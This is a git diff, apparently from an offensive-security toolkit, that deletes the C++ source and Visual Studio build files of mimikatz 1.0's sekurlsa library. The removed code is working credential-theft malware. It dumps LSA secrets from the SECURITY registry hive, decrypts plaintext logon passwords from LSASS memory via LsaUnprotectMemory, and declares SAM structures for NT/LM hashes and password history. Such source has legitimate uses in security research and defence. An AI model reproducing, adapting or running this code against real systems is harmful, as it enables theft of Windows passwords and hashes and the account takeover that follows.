- DWORD unkHistNTLM; - BYTE hashs[24][16]; -} WHashHistory, *PWHashHistory; - -DECLARE_HANDLE(HUSER); -DECLARE_HANDLE(HSAM); -DECLARE_HANDLE(HDOMAIN); - -typedef struct _SAMPR_RID_ENUMERATION -{ - unsigned long RelativeId; - LSA_UNICODE_STRING Name; -} SAMPR_RID_ENUMERATION, *PSAMPR_RID_ENUMERATION; - -typedef struct _SAMPR_ENUMERATION_BUFFER -{ - unsigned long EntriesRead; - [size_is(EntriesRead)] PSAMPR_RID_ENUMERATION Buffer; -} SAMPR_ENUMERATION_BUFFER, *PSAMPR_ENUMERATION_BUFFER; - -typedef enum _USER_INFORMATION_CLASS -{ - UserInternal1Information = 18, - UserAllInformation = 21, -} USER_INFORMATION_CLASS, *PUSER_INFORMATION_CLASS; - -typedef struct _ENCRYPTED_LM_OWF_PASSWORD -{ - BYTE data[16]; -} ENCRYPTED_LM_OWF_PASSWORD, *PENCRYPTED_LM_OWF_PASSWORD, ENCRYPTED_NT_OWF_PASSWORD, *PENCRYPTED_NT_OWF_PASSWORD; - -typedef struct _SAMPR_USER_INTERNAL1_INFORMATION -{ - ENCRYPTED_NT_OWF_PASSWORD EncryptedNtOwfPassword; - ENCRYPTED_LM_OWF_PASSWORD EncryptedLmOwfPassword; - unsigned char NtPasswordPresent; - unsigned char LmPasswordPresent; - unsigned char PasswordExpired; -} SAMPR_USER_INTERNAL1_INFORMATION, *PSAMPR_USER_INTERNAL1_INFORMATION; - -typedef struct _OLD_LARGE_INTEGER { - unsigned long LowPart; - long HighPart; -} OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER; - -typedef struct _SAMPR_SR_SECURITY_DESCRIPTOR { - [range(0, 256 * 1024)] unsigned long Length; - [size_is(Length)] unsigned char* SecurityDescriptor; -} SAMPR_SR_SECURITY_DESCRIPTOR, *PSAMPR_SR_SECURITY_DESCRIPTOR; - -typedef struct _SAMPR_LOGON_HOURS { - unsigned short UnitsPerWeek; - [size_is(1260), length_is((UnitsPerWeek+7)/8)] - unsigned char* LogonHours; -} SAMPR_LOGON_HOURS, *PSAMPR_LOGON_HOURS; - -typedef struct _SAMPR_USER_ALL_INFORMATION -{ - OLD_LARGE_INTEGER LastLogon; - OLD_LARGE_INTEGER LastLogoff; - OLD_LARGE_INTEGER PasswordLastSet; - OLD_LARGE_INTEGER AccountExpires; - OLD_LARGE_INTEGER PasswordCanChange; - OLD_LARGE_INTEGER PasswordMustChange; - LSA_UNICODE_STRING UserName; - LSA_UNICODE_STRING FullName; - LSA_UNICODE_STRING HomeDirectory; - LSA_UNICODE_STRING HomeDirectoryDrive; - LSA_UNICODE_STRING ScriptPath; - LSA_UNICODE_STRING ProfilePath; - LSA_UNICODE_STRING AdminComment; - LSA_UNICODE_STRING WorkStations; - LSA_UNICODE_STRING UserComment; - LSA_UNICODE_STRING Parameters; - LSA_UNICODE_STRING LmOwfPassword; - LSA_UNICODE_STRING NtOwfPassword; - LSA_UNICODE_STRING PrivateData; - SAMPR_SR_SECURITY_DESCRIPTOR SecurityDescriptor; - unsigned long UserId; - unsigned long PrimaryGroupId; - unsigned long UserAccountControl; - unsigned long WhichFields; - SAMPR_LOGON_HOURS LogonHours; - unsigned short BadPasswordCount; - unsigned short LogonCount; - unsigned short CountryCode; - unsigned short CodePage; - unsigned char LmPasswordPresent; - unsigned char NtPasswordPresent; - unsigned char PasswordExpired; - unsigned char PrivateDataSensitive; -} SAMPR_USER_ALL_INFORMATION, *PSAMPR_USER_ALL_INFORMATION; - -typedef [switch_is(USER_INFORMATION_CLASS)] union _SAMPR_USER_INFO_BUFFER /* http://msdn.microsoft.com/en-us/library/cc211885.aspx */ -{ - [case(UserInternal1Information)] - SAMPR_USER_INTERNAL1_INFORMATION Internal1; - [case(UserAllInformation)] - SAMPR_USER_ALL_INFORMATION All; -} SAMPR_USER_INFO_BUFFER, *PSAMPR_USER_INFO_BUFFER; - -WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr); -bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV = false); -bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV = false); -wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict = false); -wstring protectMe(wstring &maChaine); -void correctMe(wstring &maChaine); - -typedef NTSTATUS (WINAPI * PSAM_I_CONNECT) (DWORD, HSAM *, DWORD, DWORD); -typedef NTSTATUS (WINAPI * PSAM_R_OPEN_DOMAIN) (HSAM, DWORD dwAccess, PSID, HDOMAIN*); -typedef NTSTATUS (WINAPI * PSAM_R_OPEN_USER) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*); -typedef NTSTATUS (WINAPI * PSAM_R_ENUMERATE_USERS_IN_DOMAIN) (HDOMAIN, DWORD*, DWORD, PSAMPR_ENUMERATION_BUFFER *, DWORD, PVOID); -typedef NTSTATUS (WINAPI * PSAM_R_QUERY_INFORMATION_USER) (HUSER, DWORD, PSAMPR_USER_INFO_BUFFER *); -typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD); -typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER) (PSAMPR_ENUMERATION_BUFFER); -typedef NTSTATUS (WINAPI * PSAM_R_CLOSE_HANDLE) (PHANDLE); -typedef NTSTATUS (WINAPI * PSAM_I_GET_PRIVATE_DATA) (HUSER, DWORD *, DWORD *, DWORD *, PWHashHistory *); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp deleted file mode 100644 index 06d8664..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp +++ /dev/null @@ -1,99 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "secrets.h" - -PLSA_I_OPEN_POLICY_TRUSTED LsaIOpenPolicyTrusted = NULL; -PLSA_R_OPEN_SECRET LsarOpenSecret = NULL; -PLSA_R_QUERY_SECRET LsarQuerySecret = NULL; -PLSA_R_CLOSE LsarClose = NULL; - -bool searchSECFuncs() -{ - if(!(LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose)) - { - if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv")) - { - LsaIOpenPolicyTrusted = reinterpret_cast<PLSA_I_OPEN_POLICY_TRUSTED>(GetProcAddress(hLsasrv, "LsaIOpenPolicyTrusted")); - LsarOpenSecret = reinterpret_cast<PLSA_R_OPEN_SECRET>(GetProcAddress(hLsasrv, "LsarOpenSecret")); - LsarQuerySecret = reinterpret_cast<PLSA_R_QUERY_SECRET>(GetProcAddress(hLsasrv, "LsarQuerySecret")); - LsarClose = reinterpret_cast<PLSA_R_CLOSE>(GetProcAddress(hLsasrv, "LsarClose")); - } - return (LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose); - } - else return true; -} - -__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchSECFuncs() ? L"OK :)" : L"KO :(") << endl << endl << - L"@LsaIOpenPolicyTrusted = " << LsaIOpenPolicyTrusted << endl << - L"@LsarOpenSecret = " << LsarOpenSecret << endl << - L"@LsarQuerySecret = " << LsarQuerySecret << endl << - L"@LsarClose = " << LsarClose << endl; - return sendTo(monPipe, monStream.str()); -} - -__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - if(searchSECFuncs()) - { - bool sendOk = true; - wstring message; - LSA_HANDLE hPolicy; - - if(NT_SUCCESS(LsaIOpenPolicyTrusted(&hPolicy))) - { - HKEY hKeysSecrets; - if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SECURITY\\Policy\\Secrets", 0, KEY_READ, &hKeysSecrets) == ERROR_SUCCESS) - { - DWORD nbKey, maxKeySize; - if(RegQueryInfoKey(hKeysSecrets, NULL, NULL, NULL, &nbKey, &maxKeySize, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) - { - for(DWORD i = 0; (i < nbKey) && sendOk; i++) - { - DWORD buffsize = (maxKeySize+1) * sizeof(wchar_t); - LSA_UNICODE_STRING monNomSecret = {0, 0, new wchar_t[buffsize]}; - - if(RegEnumKeyEx(hKeysSecrets, i, monNomSecret.Buffer, &buffsize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) - { - monNomSecret.Length = monNomSecret.MaximumLength = static_cast<USHORT>(buffsize * sizeof(wchar_t)); - message.assign(L"\nSecret : "); message.append(mod_text::stringOfSTRING(monNomSecret)); message.push_back(L'\n'); - - LSA_HANDLE hSecret; - if(NT_SUCCESS(LsarOpenSecret(hPolicy, &monNomSecret, SECRET_QUERY_VALUE, &hSecret))) - { - LSA_SECRET * monSecret = NULL; - if(NT_SUCCESS(LsarQuerySecret(hSecret, &monSecret, NULL, NULL, NULL))) - { - message.append(L"Credential : "); message.append(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monSecret->Buffer), monSecret->Length)); message.push_back(L'\n'); - LsaFreeMemory(monSecret); - } - else message.append(L"Erreur : Impossible de récupérer le secret\n"); - LsarClose(&hSecret); - } - else message.append(L"Erreur : Impossible d\'ouvrir le secret\n"); - } - delete[] monNomSecret.Buffer; - sendOk = sendTo(monPipe, message); - } - message.clear(); - } else message.assign(L"Erreur : Impossible d\'obtenir des information sur le registre secret\n"); - RegCloseKey(hKeysSecrets); - } - else message.assign(L"Erreur : Impossible d\'ouvrir la clé Secrets\n"); - LsarClose(&hPolicy); - } - else message.assign(L"Erreur : Impossible d\'ouvrir la politique\n"); - - if(!message.empty()) - sendOk = sendTo(monPipe, message); - - return sendOk; - } - else return getSECFunctions(monPipe, mesArguments); -} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h deleted file mode 100644 index cb74837..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h +++ /dev/null @@ -1,29 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "mod_text.h" -#include <wincred.h> - -bool searchSECFuncs(); -__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments); - -#define SECRET_SET_VALUE 0x00000001 -#define SECRET_QUERY_VALUE 0x00000002 - -typedef struct _LSA_SECRET -{ - DWORD Length; - DWORD MaximumLength; - wchar_t * Buffer; -} LSA_SECRET, *PLSA_SECRET; - -typedef NTSTATUS (WINAPI * PLSA_I_OPEN_POLICY_TRUSTED) (LSA_HANDLE * pHPolicy); -typedef NTSTATUS (WINAPI * PLSA_R_OPEN_SECRET) (LSA_HANDLE hPolicy, LSA_UNICODE_STRING *, DWORD dwAccess, LSA_HANDLE * hSecret); -typedef NTSTATUS (WINAPI * PLSA_R_QUERY_SECRET) (LSA_HANDLE hSecret, PLSA_SECRET * ppSecret, PVOID pCurrentValueSetTime, PLSA_UNICODE_STRING * ppOldSecret, PVOID pOldValueSetTime); -typedef NTSTATUS (WINAPI * PLSA_R_CLOSE) (LSA_HANDLE * pHandle); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp deleted file mode 100644 index 1d07596..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp +++ /dev/null @@ -1,86 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "sekurlsa.h" -PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable = NULL; - -__kextdll bool __cdecl getDescription(wstring * maDescription) -{ - maDescription->assign(L"SekurLSA : librairie de manipulation des données de sécurités dans LSASS\n"); - return mod_system::getVersion(&mod_system::GLOB_Version); -} - -bool searchLSAFuncs() -{ - if(!SeckPkgFunctionTable) - { - if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv")) - { - struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsasrv, "LsaIRegisterNotification"), GetProcAddress(hLsasrv, "LsaICancelNotification")}; - if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification) - mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&SeckPkgFunctionTable), L"lsasrv", reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable), - FIELD_OFFSET(LSA_SECPKG_FUNCTION_TABLE, RegisterNotification), NULL, true, true); - } - } - return (SeckPkgFunctionTable != NULL); -} - -wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass) -{ - wstring password; - if(ptrPass->Buffer && (ptrPass->Length > 0)) - { - BYTE * monPass = new BYTE[ptrPass->MaximumLength]; - RtlCopyMemory(monPass, ptrPass->Buffer, ptrPass->MaximumLength); - SeckPkgFunctionTable->LsaUnprotectMemory(monPass, ptrPass->MaximumLength); - password.assign(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monPass), ptrPass->Length)); - delete[] monPass; - } - return password; -} - -bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders) -{ - bool sendOk = true; - PLUID sessions; - ULONG count; - - if (NT_SUCCESS(LsaEnumerateLogonSessions(&count, &sessions))) - { - for (ULONG i = 0; i < count && sendOk; i++) - { - PSECURITY_LOGON_SESSION_DATA sessionData = NULL; - if(NT_SUCCESS(LsaGetLogonSessionData(&sessions[i], &sessionData))) - { - if(sessionData->LogonType != Network) - { - wostringstream maPremiereReponse; - maPremiereReponse << endl << - L"Authentification Id : " << sessions[i].HighPart << L";" << sessions[i].LowPart << endl << - L"Package d\'authentification : " << mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl << - L"Utilisateur principal : " << mod_text::stringOfSTRING(sessionData->UserName) << endl << - L"Domaine d\'authentification : " << mod_text::stringOfSTRING(sessionData->LogonDomain) << endl; - - sendOk = sendTo(monPipe, maPremiereReponse.str()); - - for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++) - { - wostringstream maSecondeReponse; - maSecondeReponse << L'\t' << monProvider->second << L" : \t"; - sendOk = sendTo(monPipe, maSecondeReponse.str()); - monProvider->first(&sessions[i], monPipe, mesArguments->empty()); - sendOk = sendTo(monPipe, L"\n"); - } - } - LsaFreeReturnBuffer(sessionData); - } - else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'obtenir les données de session\n"); - } - LsaFreeReturnBuffer(sessions); - } - else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'énumerer les sessions courantes\n"); - - return sendOk; -} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h deleted file mode 100644 index c36e173..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h +++ /dev/null @@ -1,23 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "secpkg.h" -#include "mod_memory.h" -#include "mod_system.h" -#include "mod_text.h" -#include "mod_process.h" - -extern PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable; - -bool searchLSAFuncs(); -__kextdll bool __cdecl getDescription(wstring * maDescription); - -typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); -bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders); - -wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc Binary files differdeleted file mode 100644 index 2243435..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj deleted file mode 100644 index dbea2a6..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj +++ /dev/null @@ -1,154 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup Label="ProjectConfigurations"> - <ProjectConfiguration Include="Release|Win32"> - <Configuration>Release</Configuration> - <Platform>Win32</Platform> - </ProjectConfiguration> - <ProjectConfiguration Include="Release|x64"> - <Configuration>Release</Configuration> - <Platform>x64</Platform> - </ProjectConfiguration> - </ItemGroup> - <PropertyGroup Label="Globals"> - <ProjectGuid>{3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}</ProjectGuid> - <Keyword>Win32Proj</Keyword> - <RootNamespace>sekurlsa</RootNamespace> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> - <ImportGroup Label="ExtensionSettings"> - </ImportGroup> - <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <PropertyGroup Label="UserMacros" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - <ModuleDefinitionFile> - </ModuleDefinitionFile> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - <ModuleDefinitionFile> - </ModuleDefinitionFile> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemGroup> - <ClCompile Include="..\..\commun\kmodel.cpp" /> - <ClCompile Include="..\..\modules\mod_memory.cpp" /> - <ClCompile Include="..\..\modules\mod_parseur.cpp" /> - <ClCompile Include="..\..\modules\mod_pipe.cpp" /> - <ClCompile Include="..\..\modules\mod_process.cpp" /> - <ClCompile Include="..\..\modules\mod_system.cpp" /> - <ClCompile Include="..\..\modules\mod_text.cpp" /> - <ClCompile Include="modules\credman.cpp" /> - <ClCompile Include="modules\incognito.cpp" /> - <ClCompile Include="modules\sam.cpp" /> - <ClCompile Include="modules\secrets.cpp" /> - <ClCompile Include="Security Packages\msv1_0.cpp" /> - <ClCompile Include="Security Packages\msv1_0_helper.cpp" /> - <ClCompile Include="sekurlsa.cpp" /> - </ItemGroup> - <ItemGroup> - <ClInclude Include="..\..\commun\kmodel.h" /> - <ClInclude Include="..\..\commun\secpkg.h" /> - <ClInclude Include="..\..\modules\mod_memory.h" /> - <ClInclude Include="..\..\modules\mod_parseur.h" /> - <ClInclude Include="..\..\modules\mod_pipe.h" /> - <ClInclude Include="..\..\modules\mod_process.h" /> - <ClInclude Include="..\..\modules\mod_system.h" /> - <ClInclude Include="..\..\modules\mod_text.h" /> - <ClInclude Include="modules\credman.h" /> - <ClInclude Include="modules\incognito.h" /> - <ClInclude Include="modules\sam.h" /> - <ClInclude Include="modules\secrets.h" /> - <ClInclude Include="Security Packages\msv1_0.h" /> - <ClInclude Include="Security Packages\msv1_0_helper.h" /> - <ClInclude Include="sekurlsa.h" /> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="sekurlsa.rc" /> - </ItemGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> - <ImportGroup Label="ExtensionTargets"> - </ImportGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters deleted file mode 100644 index 936fcde..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters +++ /dev/null @@ -1,122 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup> - <Filter Include="Modules Communs"> - <UniqueIdentifier>{87c9f520-31d1-4b44-a523-415e0c703bde}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Communication"> - <UniqueIdentifier>{8c6588bf-b3cf-4080-b59e-3ce82a6ccd62}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Parseur"> - <UniqueIdentifier>{9e44771d-18f4-407a-8f89-508cf5c366ff}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Librairie Modèle"> - <UniqueIdentifier>{541a9eff-641d-4a77-9b1f-e72ad6a7c0fa}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Mémoire"> - <UniqueIdentifier>{ba6b07a5-6d5b-4632-ad6e-56690630eaa7}</UniqueIdentifier> - </Filter> - <Filter Include="Security Packages"> - <UniqueIdentifier>{1e52fbf9-a352-419f-870b-3c4e265781d8}</UniqueIdentifier> - <Extensions> - </Extensions> - </Filter> - <Filter Include="Modules Communs\System"> - <UniqueIdentifier>{7fcd7c52-b4e5-4c6c-9dc7-190fbe667193}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Texte"> - <UniqueIdentifier>{c175e3ec-41d0-4474-bbc7-eb1962a7fc70}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour sekurlsa"> - <UniqueIdentifier>{b3819528-2e60-46a3-b37a-7c575a4d866a}</UniqueIdentifier> - </Filter> - </ItemGroup> - <ItemGroup> - <ClCompile Include="..\..\modules\mod_pipe.cpp"> - <Filter>Modules Communs\Communication</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_parseur.cpp"> - <Filter>Modules Communs\Parseur</Filter> - </ClCompile> - <ClCompile Include="..\..\commun\kmodel.cpp"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_memory.cpp"> - <Filter>Modules Communs\Mémoire</Filter> - </ClCompile> - <ClCompile Include="sekurlsa.cpp" /> - <ClCompile Include="..\..\modules\mod_system.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="Security Packages\msv1_0.cpp"> - <Filter>Security Packages</Filter> - </ClCompile> - <ClCompile Include="Security Packages\msv1_0_helper.cpp"> - <Filter>Security Packages</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_text.cpp"> - <Filter>Modules Communs\Texte</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_process.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="modules\incognito.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - <ClCompile Include="modules\secrets.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - <ClCompile Include="modules\credman.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - <ClCompile Include="modules\sam.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - </ItemGroup> - <ItemGroup> - <ClInclude Include="..\..\modules\mod_pipe.h"> - <Filter>Modules Communs\Communication</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_parseur.h"> - <Filter>Modules Communs\Parseur</Filter> - </ClInclude> - <ClInclude Include="..\..\commun\kmodel.h"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_memory.h"> - <Filter>Modules Communs\Mémoire</Filter> - </ClInclude> - <ClInclude Include="sekurlsa.h" /> - <ClInclude Include="..\..\modules\mod_system.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="Security Packages\msv1_0.h"> - <Filter>Security Packages</Filter> - </ClInclude> - <ClInclude Include="Security Packages\msv1_0_helper.h"> - <Filter>Security Packages</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_text.h"> - <Filter>Modules Communs\Texte</Filter> - </ClInclude> 